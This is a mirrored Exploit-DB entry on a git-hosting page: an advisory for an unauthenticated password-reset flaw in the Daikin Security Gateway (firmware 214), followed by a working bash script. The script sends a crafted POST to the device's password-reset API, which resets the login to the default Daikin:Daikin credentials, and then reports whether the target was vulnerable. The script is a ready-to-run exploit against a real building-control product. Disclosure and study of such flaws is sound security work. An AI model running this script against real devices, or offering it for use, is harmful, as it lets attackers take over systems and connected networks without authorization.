bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/local/52278.txt
Exploit-DB 5544e2e039 DB: 2025-05-02 
5 changes to exploits/shellcodes/ghdb

Daikin Security Gateway  14 - Remote Password Reset

ZTE ZXV10 H201L - RCE via authentication bypass

Microsoft - NTLM Hash Disclosure Spoofing (library-ms)

Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing
2025-05-02 00:16:30 +00:00

55 lines
No EOL
2 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Daikin Security Gateway 214 - Remote Password Reset
# Vendor: Daikin Industries, Ltd.
# Product web page: https://www.daikin.com
# https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
# Affected version: App: 100, Frm: 214
#
# Summary: The Security gateway allows the iTM and LC8 controllers
# to connect through the Security gateway to the Daikin Cloud Service.
# Instead of sending the report to the router directly, the iTM or
# LC8 controller sends the report to the Security gateway first. The
# Security gateway transforms the report format from http to https
# and then sends the transformed https report to the Daikin Cloud
# Service via the router. Built-in LAN adapter enabling online control.
#
# Desc: The Daikin Security Gateway exposes a critical vulnerability
# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
# attacker can send a crafted POST request to this endpoint, bypassing
# authentication mechanisms. Successful exploitation resets the system
# credentials to the default Daikin:Daikin username and password combination.
# This allows attackers to gain unauthorized access to the system without
# prior credentials, potentially compromising connected devices and networks.
#
# Tested on: fasthttp
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2025-5931
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
#
#
# 21.03.2025
#
[ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; }
TARGET_IP="$1"
URL="https://$TARGET_IP/api/settings/password/reset"
PAYLOAD="t00t"
[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; }
RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null)
[ $? -ne 0 ] && { echo "Cant reach $TARGET_IP."; exit 1; }
if [[ $RESPONSE =~ \"Error\":0 ]]; then
echo "Reset worked! Vulnerable."
elif [[ $RESPONSE =~ \"Error\":1 ]]; then
echo "Not vulnerable."
else
echo "Got: $RESPONSE"
fi
Reference in a new issue View git blame Copy permalink